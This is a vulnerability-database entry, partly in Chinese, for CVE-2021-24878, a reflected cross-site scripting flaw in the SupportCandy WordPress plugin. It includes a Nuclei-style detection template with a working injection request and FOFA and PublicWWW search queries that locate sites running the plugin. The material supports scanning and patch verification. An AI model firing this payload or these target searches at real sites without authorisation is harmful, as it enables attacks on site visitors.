CVE-2021-24878: SupportCandy < 2.2.7 - Reflected Cross-Site Scripting

日期: 2025-08-01 | 影响软件: SupportCandy | POC: 已公开

漏洞描述

The SupportCandy WordPress plugin before 2.2.7 does not sanitise and escape the query string before outputting it back in pages with the [wpsc_create_ticket] shortcode embed, leading to a Reflected Cross-Site Scripting issue

PoC代码[已公开]

id: CVE-2021-24878

info:
  name: SupportCandy < 2.2.7 - Reflected Cross-Site Scripting
  author: popcorn94
  severity: medium
  description: |
    The SupportCandy WordPress plugin before 2.2.7 does not sanitise and escape the query string before outputting it back in pages with the [wpsc_create_ticket] shortcode embed, leading to a Reflected Cross-Site Scripting issue
  remediation: Fixed in 2.2.7
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24878
    - https://github.com/andrewcy86/supportcandy(plugin)
    - https://wpscan.com/vulnerability/d2f1fd60-5e5e-4e38-9559-ba2d14ae37bf/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-24878
    cwe-id: CWE-79
    epss-score: 0.02229
    epss-percentile: 0.83931
    cpe: cpe:2.3:a:supportcandy:supportcandy:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: supportcandy
    product: supportcandy
    framework: wordpress
    fofa-query: body="/wp-content/plugins/supportcandy/"
    publicwww-query: "/wp-content/plugins/supportcandy/"
  tags: cve,cve2021,wordpress,wpscan,wp-plugin,supportcandy,xss

http:
  - raw:
      - |
        GET /?};alert(1)// HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "var attrs = {};alert(1)//:"
          - "wpsc_create_ticket_init"
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100a5cc4793d79c8bbac1a2343f12d47be97cbfcd929f720dcfa81e3b5d3e8570d802205bb8aa8b35f34594641f00a25a67298f5303cb8c810b60b84bc927254d96ed6e:922c64590222798bb761d5b6d8e72950

相关漏洞推荐